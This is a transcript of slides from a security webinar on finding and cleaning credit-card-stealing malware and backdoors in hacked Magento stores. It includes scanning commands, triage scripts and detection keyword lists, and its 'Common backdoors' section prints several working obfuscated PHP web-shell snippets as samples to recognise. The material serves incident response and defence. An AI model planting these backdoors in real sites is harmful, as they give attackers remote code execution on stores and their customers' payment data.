How to CLEAN a Hacked Magento Site - WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
VALENTIN VESA, Brand Evangelist - Moderator, @adspedia
HOUSEKEEPING ITEMS
● We want to hear from you
● Question tab in GoToWebinar
● Tweet @SucuriSecurity using #AskSucuri
● Questions will be answered at the end
● All questions will receive a response
● Video and slides coming in a few days
● Please share this content with other website owners
CESAR ANJOS, Security Analyst / Incident Responder at Sucuri
Porto, Portugal
What to expect from this webinar
● Understanding if there may have been some compromise
● How to assess if there may be any credit card stealers on the site
● How to look for the most common types of credit card stealers
● How to get rid of most infections without actually having much technical knowledge
sucuri.net/guides
Step-by-step walkthroughs
for popular CMS platforms
and website security issues.
Get Instructions
Data stealer malware
● Biggest enemy of Magento installations.
● Confirmation of a breach may require cooperation with authorities.
● Advisable to alert customers as they may have not (yet) been affected by it.
Overview
● Looking for signs of compromise
● Finding the malware
● Clean the infection and wipe its remains
● What Now?
Understanding data breach implications
If any compromise happens, be sure to make a full backup of:
● Server log files
● All files pertaining to the site
● Database
Having a data breach on your website affects the website, its owner, and its users.
The website owner has the responsibility to investigate any suspicion of compromise and keep a record of all findings.
Any data stolen by the attackers is usually used within the first 12 hours (post-theft). In some cases, it may also be kept for later use, or sold.
LOOKING FOR SIGNS OF COMPROMISE
What are some of the indicators that your website has been compromised?
Indicators of compromise:
● Customers reporting strange behavior on your site
● Checkout process acting oddly
● Customers complaining that their data was stolen after buying on your website
● External scanners detecting some malware or blacklist
● Unauthorized accesses or changes
● You just spot something strange, such as a defacement
Dialog with customers
What they report:
● Data being stolen
● Redirects
● Pop-ups
● Alert messages
What you need to verify:
● When exactly did the visit and theft occur
● What browser/Antivirus/OS/platform
● Were any purchases done on other websites
● Detailed explanation of what happened
Abnormal checkout behavior
● Redirects
● Pop-ups
● Strange files being loaded on the page
● Payments going to someone else’s account
● Just doesn’t work
Ensuring that the entire flow keeps its integrity is very important.
Using a Virtual Credit Card
● Virtual credit cards have a spending limit and usually a very short expiration date
● Most banks across the world offer such a service
● Low risk if stolen
● Can use a pre-paid or debit system
● No direct relation between the card and your identity
● May have a per-card cost, usually $1.
Scan your site
● Sucuri Sitecheck - sitecheck.sucuri.net
● Hypernode’s Magereport - magereport.com
● Magescan - magescan.com
● Google’s Virustotal - virustotal.com
Sitecheck
● Checks for blacklists
● Scans for multiple kinds of malware within the site
● Provides immediate insight on what was detected
Magereport
● Checks for missing patches or vulnerable elements
● Checks for certain specific malware types that affect Magento environments
Virustotal
Checks for blacklists on multiple providers
Blacklist
Google’s blacklist is the most damaging blacklist.
Blacklisted websites lose about 95% of traffic.
Modus operandi of credit card swipers
Sends the data to an external domain:
● Typically JavaScript
● Can work based on the current page, e.g. “firecheckout”
● Can be present in PHP files that directly handle checkouts
● Gets cached easily by Magento
Stores the data in your domain’s files:
● Typically stored inside /media
● Usually disguises itself as an image or a file with no extension
● File size grows beyond 3 MB extremely fast
● Can only be inside PHP files
FINDING THE MALWARE
How can the malware be located?
Focused analysis
● Needle in a haystack
● Start by focusing on what you already know
● Attempting to establish a timeframe is important in data theft cases
● Look for what else may be present
Check modified files
● Using the diff command to compare with a clean version
● Checking for files modified within the last few days if you suspect the compromise was recent
● Try Amasty’s Free Modified Core files reporting tool
https://blog.amasty.com/freebie-magento-modified-core-files-report-by-amasty
Diff command
● $ mkdir magento-2.1.3
● $ cd magento-2.1.3
● $ wget https://github.com/magento/magento2/archive/2.1.3.tar.gz
● $ tar -zxvf 2.1.3.tar.gz
● $ diff -r magento2-2.1.3 ./public_html
  (a GitHub release archive unpacks into a directory named after the repository and tag, here magento2-2.1.3; adjust ./public_html to the path of your site’s document root)
● Has to be run through SSH.
● Useful to get a direct comparison of what is different between 2 sets of folders.
● If the comparison is done with a freshly downloaded installation, any modules that have been installed by the owner have to be compared separately.
● Can also be used to compare the current live version with a backup to get a direct result of what is different.
Files modified recently
● $ find ./ -type f -mtime -15
  Tells what files were modified in the last 15 days
● $ find ./ -type f -mtime -30
  Tells what files were modified in the last 30 days
● This gives a clear indication of what files have been modified in the timeframe specified.
● If you have a clear date of when the compromise might have happened, this is a great starting point.
Pro Tip - Check your modified files
● Look for files bigger than 3 MB as they may store customers’ stolen data
  $ find . -type f -size +3M
● Use Sucuri’s Backup service as an integrity records keeper
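The two file-level checks above (recent modification, files over 3 MB) and the /media disguise described earlier, combined into one triage script. This is an added example, not tooling from the webinar; it assumes a POSIX sh with find(1) and grep(1) and takes the document root, a day count and a size threshold as arguments.

```shell
#!/bin/sh
# Added example, not tooling from the webinar: triage a Magento document root
# for recently modified files, files over N MB that may hold harvested card
# data, and PHP code hiding under /media regardless of file extension.
# Assumptions: POSIX sh with find(1) and grep(1); the caller passes the docroot.

# Regular files modified within the last $2 days under $1. Magento's cache,
# session and log directories change constantly, so they are skipped.
recent_files() {
    find "$1" -type f -mtime "-$2" \
        ! -path "*/var/cache/*" \
        ! -path "*/var/session/*" \
        ! -path "*/var/log/*" 2>/dev/null | sort
}

# Regular files larger than $2 megabytes under $1 (the slide's -size +3M).
large_files() {
    find "$1" -type f -size "+${2}M" 2>/dev/null | sort
}

# Files that are both recent (within $2 days) and large (over $3 MB): the
# strongest candidates for a swiper's growing drop file.
recent_large_files() {
    recent_files "$1" "$2" | while IFS= read -r f; do
        # re-test each candidate individually against the size threshold
        if [ -n "$(find "$f" -type f -size "+${3}M")" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Files under $1/media that contain a PHP open tag, whatever their extension:
# a "logo.jpg" or an extension-less file that is really PHP is the disguise
# described on the slides.
php_in_media() {
    grep -rl -- '<?php' "$1/media" 2>/dev/null | sort
}

# Usage: sh triage.sh /var/www/public_html 15 3
if [ $# -eq 3 ]; then
    echo "== modified in last $2 days"; recent_files "$1" "$2"
    echo "== larger than $3 MB";        large_files "$1" "$3"
    echo "== both";                     recent_large_files "$1" "$2" "$3"
    echo "== PHP under media/";         php_in_media "$1"
fi
```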
Audit users list
● Any unfamiliar users must be removed
Functions/code most used by malware that steals credit card info/logins
Search for common swiper functions/code
● <script (with inclusion of an external file)
● http.open
● http.send
● this[“eval”]
● fwrite
● file_put_contents
● FILE_APPEND
● mail(
● Curl
Example swipers on app/code/core/Mage/Checkout/controllers/OnepageController.php
Search for common backdoor functions/code
● assert
● stripslashes
● preg_replace (with the /e modifier)
● move_uploaded_file
● strrev
● file_get_contents
● encodeURI
● strtr
● base64
● str_rot13
● gzuncompress
● gzinflate
● curl_exec
● exec
● create_function
● wget
● system
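A grep-based scan over the swiper indicators and the backdoor indicators from the two lists above, reporting which file matched which string and ranking files by number of distinct hits. This is an added example, not the webinar's tooling; it assumes a POSIX sh whose grep supports -r, and the indicator lists are a subset you can extend.

```shell
#!/bin/sh
# Added example, not tooling from the webinar: grep a Magento tree for the
# swiper and backdoor indicators listed on the slides and report which file
# matched which indicator. A hit is a lead to inspect, not proof of malware:
# legitimately encoded extensions also match base64/gzinflate-style strings.
# Assumption: POSIX sh with grep -r support; $1 is the directory to scan.

# Fixed strings from the swiper list (exfiltration and local storage).
SWIPER_INDICATORS='<script src=
http.open
http.send
this["eval"]
fwrite(
file_put_contents(
FILE_APPEND
mail('

# Fixed strings from the backdoor list (execution and decoding helpers).
BACKDOOR_INDICATORS='assert(
preg_replace(
move_uploaded_file(
base64_decode(
str_rot13(
gzuncompress(
gzinflate(
curl_exec(
create_function(
system('

# Print "indicator<TAB>file" for every file under $1 containing an indicator,
# sorted and de-duplicated so two runs can be compared with diff.
scan_indicators() {
    printf '%s\n%s\n' "$SWIPER_INDICATORS" "$BACKDOOR_INDICATORS" |
    while IFS= read -r pat; do
        [ -n "$pat" ] || continue
        grep -rlF -- "$pat" "$1" 2>/dev/null |
        while IFS= read -r f; do printf '%s\t%s\n' "$pat" "$f"; done
    done | sort -u
}

# Distinct indicators per file, highest count first: a checkout controller
# or footer template with several hits deserves the first look.
rank_files() {
    scan_indicators "$1" | cut -f2 | sort | uniq -c | sort -rn
}
```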
Common backdoors
<?php if/*pzC*/(isset($_REQUEST['gTOM']))/*A*/{/*h*/$1=/*B*/"assert";$G=$1/*HJ*/(/*jyM*/$_REQUEST\['gTOM'])/*tC*/;exit;}?>
<?php /*k*/if(!function_exists('_BmHCiKnI')){$GLOBALS['_CbuEzptH_']=Array('' .'preg_repla' .'ce'); @function
_BmHCiKnI($i){$a=Array('jQzN','/(.*)/e','jQzN','');return $a[$i];}if(@isset($_REQUEST[_BmHCiKnI(0)])){
@$GLOBALS['_CbuEzptH_'][0](_BmHCiKnI(1),$_REQUEST[_BmHCiKnI(2)],_BmHCiKnI(3));exit;}}
<?php if(isset($_COOKIE["lI"])){$_COOKIE["ud"]($_COOKIE["lI"]);exit;}
<?php function echo2($token){ @eval($token);}echo2($_POST[libsodium]);?>
if(md5($_COOKIE['key']) == $key) { eval (base64_decode($_POST["code"])); }
${"QK"}=@$ {"_POST"/*cdtxd6*/};@((($QK{ "0"}/*vgx94*/<>@$QK{"1"})))?@ $QK{"2" }(( (/*nkp*/@${"QK"}{"3"}))):${'QK'
Check your site’s header and footer areas
Footer and header areas are a prime target for attackers because they load throughout the site.
Check with an outside expert
Consult directly with security experts when in doubt, or if you simply need assistance.
CLEAN THE INFECTION AND WIPE ITS REMAINS
How to effectively get rid of Magento’s most common infections
Before you attempt to fix anything
● Ensure that you have performed a full backup of files and database
● Store them in a safe location
● Preferably import your website into a temporary environment
● Place your website in maintenance mode, if required
● Contact authorities if you are a big store and there was any data theft
Fix hacked files
● Search the files for any malware indication you may have obtained
● Inspect the modified files that were discovered by the investigation
● Restore those files to a known-good legitimate state from official sources
● Googling parts of suspicious code may help with cleanup
● Remove any suspicious code
● Test the site to ensure everything still works as it should
Suspicious code
● Sometimes code may look suspicious because it is encoded, but many modules have their code encoded to prevent it being stolen.
● The modules must be individually compared with their original version.
● Some online tools that help decode the remaining code:
● ddecode.com/phpdecoder
● unphp.net/
● jsbeautifier.org/
Using ddecode.com
Using unphp.net
Database infections
● Ensure that you have a full backup before any operation.
● They can usually be cleaned directly through the backend of the site.
● Attackers usually infect the core_config_data table, more specifically the records design/head/includes and design/footer/absolute_footer.
Tidying up
● Reset user passwords
● Change cPanel or FTP/SFTP credentials
● Review who has access to what
● Clear caches (very important step)
● Fix any malware warnings or blacklists
ALL CLEAN, WHAT NOW?
Steps to take
● Ensure all security patches are applied
● Have a backup system in place
● Scan computers that access the backend
● Add extra control/protection mechanisms to the site
● Take every precaution to ensure that all vulnerable areas are secure or patched, such as /downloader
● Change backend admin area URL
● Make regular purchases on your own site to ensure its integrity (using virtual Credit Cards)
Useful extensions/services to have in place
● Sucuri Firewall
● MageFirewall Security
● Nexcess Sentry Two-Factor Authentication
● miniOrange Two-Factor Authentication
● Admin Actions Log extension (if there are various admin users)
You have to assume the attackers will be back
● Keep all accesses filtered and monitored
● Keep up with security updates
● Prepare an incident response plan with your team - https://github.com/talesh/response
● Ensure that the backup system works when needed; test by restoring it on a separate location and verify that it works
Website Firewall
Tweet us any time with your questions @SucuriSecurity using #AskSucuri
THANK YOU
Time for Questions